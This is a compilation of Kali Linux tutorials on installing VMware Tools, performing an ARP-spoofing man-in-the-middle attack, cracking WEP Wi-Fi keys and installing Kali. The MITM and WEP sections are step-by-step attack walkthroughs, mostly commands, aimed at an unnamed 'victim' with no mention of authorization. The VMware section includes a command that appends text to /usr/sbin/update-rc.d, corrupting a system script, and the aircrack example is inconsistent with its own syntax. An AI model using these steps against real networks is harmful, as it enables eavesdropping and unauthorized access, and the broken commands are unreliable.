Installing VMware Tools in Kali

Should you decide to create your own VMware installation of Kali Linux rather than using the  pre-made VMware images available at Kali Linux official site, you will need to follow the instructions below in order to successfully install VMware Tools in your Kali installation. You can opt to install either open-vm-tools, or the native VMWare tools.

Installing open-vm-Tools

This is probably the easiest way to get “VMWare tools” functionality inside a kali VMWare guest.

apt-get install open-vm-tools

This should be sufficient, but if you are feel that this was way too easy, then you are up for an adventure. Without knowledge of cli, what follows might look like a nightmare.

Installing VMware Tools in Kali

If open-vm-tools does not work for you, or if you prefer using native VMWare tools, begin by installing some packages that are required by the VMware Tools installer:

echo cups enabled >> /usr/sbin/update-rc.d
echo vmware-tools enabled >> /usr/sbin/update-rc.d

apt-get install gcc make linux-headers-$(uname -r)
ln -s /usr/src/linux-headers-$(uname -r)/include/generated/uapi/linux/version.h /usr/src/linux-headers-$(uname -r)/include/linux/

Next, mount the Vmware tools ISO by clicking “Install VMware Tools” from the appropriate menu. Once the VMware Tools ISO has been attached to the virtual machine, we mount the drive and copy the VMware Tools installer to /tmp/.

mkdir /mnt/vmware
mount /dev/cdrom /mnt/vmware/
cp -rf /mnt/vmware/VMwareTools* /tmp/

Then, change directory to /tmp/, extract the tarball and start the installer:

cd /tmp/
tar zxpf VMwareTools-*.tar.gz
cd vmware-tools-distrib/
./vmware-tools-install.pl

Follow the prompts for the VMware Tools installation and you are done.

Lastly, to get rid of possible VMWare service errors, edit the /etc/init.d/vmware-tools script, and at around line 876, change:

 # POSIX shell uses '!' for negation during bracket expansion.
   # See http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html
   IFS=.
   set -- `uname -r`

to :

 # POSIX shell uses '!' for negation during bracket expansion.
   # See http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html
   IFS=.
   set -- `uname -r|cut -d"-" -f1`

Once changed, proceed to restart the VMWare tool service.

Slow Mouse Movement in VMware

If your mouse movement is slow and sluggish in a Kali Linux VMware guest, try installing the xserver-xorg-input-vmmouse package in the Kali guest.

apt-get install xserver-xorg-input-vmmouse
reboot

Kali Linux in the Middle Attack

Today our tutorial will talk about Kali Linux Man in the Middle Attack. How to perform man in the middle attack using Kali Linux?we will learn the step by step process how to do this.

I believe most of you already know and learn about the concept what is man in the middle attack, but if you still don't know about this, here is some definition from wikipedia.

The man-in-the-middle attack (often abbreviated MITM, MitM, MIM, MiM, MITMA) in cryptography and computer security is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.

Scenario:

This is the simple scenario, and I try to draw it in a picture.

Victim IP address : 192.168.8.90

Attacker network interface : eth0; with IP address : 192.168.8.93

Router IP address : 192.168.8.8

Requirements:

1. Arpspoof

2. Driftnet

3. Urlsnarf

Step by step Kali Linux Man in the Middle Attack :

1. Open your terminal (CTRL + ALT + T kali shortcut) and configure our Kali Linux machine to allow packet forwarding, because act as man in the middle attacker, Kali Linux must act as router between "real router" and the victim. Read the tutorial here how to set up packet forwarding in linux.

2. You can change your terminal interface to make the view much more friendly and easy to monitor by splitting kali linux terminal window.

3. The next step is setting up arpspoof between victim and router.

arpspoof -i eth0 -t 192.168.8.90 192.168.8.8

4. And then setting up arpspoof from to capture all packet from router to victim.

arpspoof -i eth0 192.168.8.8 192.168.8.90

5. After step three and four, now all the packet sent or received by victim should be going through attacker machine.

6. Now we can try to use driftnet to monitor all victim image traffic. 

Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

7. To run driftnet, we just run this

driftnet -i eth0

When victim browse a website with image, driftnet will capture all image traffic as shown in the screenshot below.

To stop driftnet, just close the driftnet window or press CTRL + C in the terminal

8. For the next step we will try to capture the website information/data by using urlsnarf. To use urlsnarf, just run this code

urlsnarf -i eth0

and urlsnarf will start capturing all website address visited by victim machine.

9. When victim browse a website, attacker will know the address victim visited.

Tutorial: Hacking WEP

([For this tutorial you need external WiFi adapter] OR [have BackTrack installed in your Hard Drive, not a virtual machine])
(Otherwise, look for the method using normal windows OS in the 'In too Deep' section)

Open up BackTrack, Login and then follow the below steps

1. Open konsole and type the following to start up network connections.
»/etc/init.d/networking start

2. Now we are going to put the network card into moniter mode by typing the following.
»airmon-ng
(You will find your Interface here)

3. So first start up the scan
»airmon-ng start wlan0
or
»airmon-ng start wlan1
(this command depends on what it reads on your router or networking card as, replace as needed)

4. Lets spoof your MAC address first by typing this next command.

»ifconfig wlan1 down
»macchanger -r wlan1
»ifconfig wlan1 up

This will change the MAC address being used to the computer we are connecting to.

5. Time to start finding our victim's router, type the following in konsole.
»airodump-ng mon0

This will show the entire list of all the WiFi connections your adapter can catch and once you find one that suits your interest, and continue:

6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole: (Read slowly!)

»airodump-ng -c [channel number] --bssid [the BSSID of the router] -w [new name for the cap file] mon0 (the interface we are using)

For Example: »airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w Newcapfile mon0

(*IMPORTANT- You have to fill in everything between [ ] yourself, since it is different for every case. You will get the BSSID, channel number from the previois steps, 'mon0' or 'mon1' based on your adapter, and for name of cap file you can type in any file name like 'MyCapFile')

7. Lets start the passphrapse cracking. We need to get around 30,000-50,000 IVs(packets). We start by sending fake authentication requests. To do this open a new konsole and type:

»aireplay-ng -1 1 -a [The BSSID of the router] mon0

example: »aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0

8. Almost done, we just need to contune the capturing process, open another konsole and type:

»aireplay-ng -3 -b [The BSSID of the router] mon0
Now it will start replaying ARPs. (ARP = Address Resolution protocol, it is needed to find the device address from the IP address)

Collect a good amount of IVs like around 30,000-50,000(the more the better).(Depending on the network strength, this step can take anywhere from 15 minutes to about 3 hours). It should be stored in the .cap file Once you've captured enough packets, type CTRL + C to stop the process and continue to step 9.

9. Time to start cracking that cap file :D You can think of it like every single packet contains a bit of leaked password. So we've captured a large number of packets, compiled them in the .cap file and now we're going to try and find out tiny bits of information from each packet and piece it together to give us the PassPhrase. Open a new konsole and type:

»aircrack-ng -b [bssid] [file name]-01.cap

example: »aircrack-ng 11:22:33:44:55:66 wepcap-01.cap

10. Wait a few seconds and we should now be presented with the key to log in to the router.

Key Commands.
►nwlan0 = Interface (Examples: wlan0, ath0, eth0)
►nch = The channel the target is on (Examples: 6, 11 You can find out using your wifi adapter's interface)
►nbssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
►nssid = Name of target (Examples: linksys, default)
►filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
►fragment-*.xor= The * being replaced by a number
►(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

Tutorial: Installing Kali

Around April 2014, www.backtrack-linux.org officially stopped supporting backtrack downloads. This was mainly due to the release of Kali 1.0.6 which fixed majority of the bugs in the OS. Although Backtrack is still available through torrents, it's better to move on to newer and better things, namely, Kali. 

In a nutshell, mathematics tells us the difference between windows 8 and windows 8.1 is 0.1, Similarly, Backtrack and Kali are not that different. Kali is the like the next revamped version of BackTrack. If you prefer to keep using Backtrack, you're not exactly missing out on something huge (yet). But still, it's always better to use up to date software, nobody knows that better than us hackers. Backtrack ruled the hacking universe for nearly 8 years (released in 2006) and now the torch is in the hands of Kali. So, here we'll be taking a brief look at the two operating systems, their differences and advantages of Kali over Backtrack and finally how to install Kali. 

Differences between Kali & BackTrack 
Like I said, Kali is not so different than Backtrack. At first look, you'll probably notice the slight GUI change. The tools are in different places but it shouldn't take long to get used to. One major difference beginners may not notice is that Kali is built on Debian Linux instead of Ubuntu Linux. The Debian vs Ubuntu debate is a whole other topic, so we're not getting into that. Plus, you don't need to fill your head with unnecessary information. Kali can be thought of as the next iteration of Backtrack. The developers are the same, the functionality is almost the same and the GUI change is definitely for the better. 
The advantages of Using Kali Over BackTrack 
•'Some' new tools. 
•The new GNOME interface. 
•Regular updates, updated tools like Metasploit, p0f etc. 
•A build specifically designed for the ARM architecture (read: 'android smarphones compatible'). 
•All tool directories are in the PATH variable, so any tool can be called from anywhere. 
(Also now that backtrack has no future, we don't have that much of a choice) 

There's no game changer advantage of Kali over Backtrack. But now that Backtrack is no longer going to update, vulnerabilities will start popping up in the OS which will be fixed in Kali but not Backtrack. The last thing a hacker needs is to get hacked him/herself. Let's install Kali now. If you've installed Backtrack earlier, the installation process of Kali is practically identical. 

Step 1: Download & Burn Kali 
Head over to: http://www.kali.org/downloads/ 

There are quite a few options, the only ones you need to worry about are 64 bit or 32 bit and torrent or direct download. Check out the properties page of your 'My Computer'. If your architecture (OS and processor) are 64 bit, download the 64 bit one. If you're not sure, you may simply download the 32-bit version which works on all systems. (If you have 4GB or less RAM, 32 bit or 64 bit doesn't make a difference). The download is around 3GB in size. 

Below on that page you'll see two more versions, ARMEL and ARMHF. They are relevant when installing Kali on ARM hardware devices (like Android smartphones and tablets). But, right now we're trying to get Kali running on a PC. 

Once we've got the ISO file, you can either burn it to a DVD to install as a permanent OS on your system or you can create a bootable USB Drive using software like UNetBootin. (See the tutorial on Backtrack for exact instructions) 

Step 2: Install Kali 

We'll be installing Kali on a Virtual machine. The two best virtualization systems are VMWare and Virtual Box. They are both equally good, but VMWare is paid. So, for a beginner hacker I recommend using Virtual Box. On startup, just like BackTrack, you can log in as "root" with a password of "toor". Then, type "startx" to start the X-Windows system. 

Using a virtual machine may not always be ideal. The main disadvantage is performance. Running an OS on top of another OS is bound to cause lagging. A system with 4GB RAM should handle it sufficiently well as long as no other programs are running. For optimal performance, 6GB (or more) RAM is recommend. 

Further, for wireless hacking using a virtual machine, we need an external wireless card or adapter. They are usually small pen drives using which you can connect to a wifi network. Also, they must be compatible with aircrack-ng, the main wifi hacking software. 

As mentioned before, you may also install it alongside your present OS so that both of them can mind their own business one at a time. To do that, you can use your burned DVD or USB drive and simply boot with the booting device jacked in. (You may need to alter the Booting Sequence through the BIOS menu). 

Once the booting begins, you can click on the Install Kali button and follow the steps in the install wizard. 

The disadvantages of using a VM are the advantages of using a dual boot system. Kali will run faster with less resources, you will not need an additional wireless card and you will not have the additional complexities of working in a VM. But installing another permanent OS may not be ideal for everyone. You may choose whichever method you like. If you have used another Linux distribution with the GNOME interface, you'll notice that the pull-down menus at the top of the desktop look familiar, just like Backtrack. Also just like backtrack, we can find all the same tools (and some new ones) in the same upper left corner applications menu categorized in the same way. One interesting menu is the "Top Ten Security Tools" menu. You'll find that it includes some of the most popular tools such as nmap, Metasploit, sqlmap, Wireshark, and aircrack-ng among others. Now you're all set and you can start hacking with Kali Linux! 

*Since Kali officially supports ARM hardware, almost all android devices can run Kali. There's an app called 'Linux Deploy' on the play store which does all the heavy lifting for us. All we need to do, is set a few options and hit install. The requirements for installing Kali on android phones are : Minimum android version 2.1 (rooted), 5GB free space in any one place (internal or external storage), decent internet speed and some patience. 

Here's the URL for the Linux Deploy app: 
https://play.google.com/store/apps/details?id=ru.meefik.linuxdeploy 

And here's the official tutorial for getting Kali up and running on your smartphone: 
http://www.kali.org/how-to/kali-linux-android-linux-deploy 

Linux Deploy basically lets the user select which Linux distribution they want to install, the processor architecture, mirror URL, installation path etc. If you simply want to get it up and running quickly, Linux deploy provides defaults that almost always work. Although very improbable, even if something does go wrong, the installation of Kali on your android phone is completely reversible. On hitting the Install button, Linux Deploy will start downloading the image file and then go on to install it. 

For exact instructions, head to the official tutorial URL given above. 
A few pointers: Make sure you select Kali Linux under the distribution tab. The download is approximately 2GB in size, so plan accordingly. There are two architecture types, ARMEL and ARMHF. ARMEL is for ARMv4 instruction set and ARMHF is for ARMv7 instruction set for the phone's processor. The majority of phone today have ARMv7 (or above), but if you have a relatively old model, you may wish to google up your phone's specifications to find out which one you can run. One last thing, around 4GB minimum is recommended for the image size but if you plan on installing a lot of tools you can manually change the image size in Linux Deploy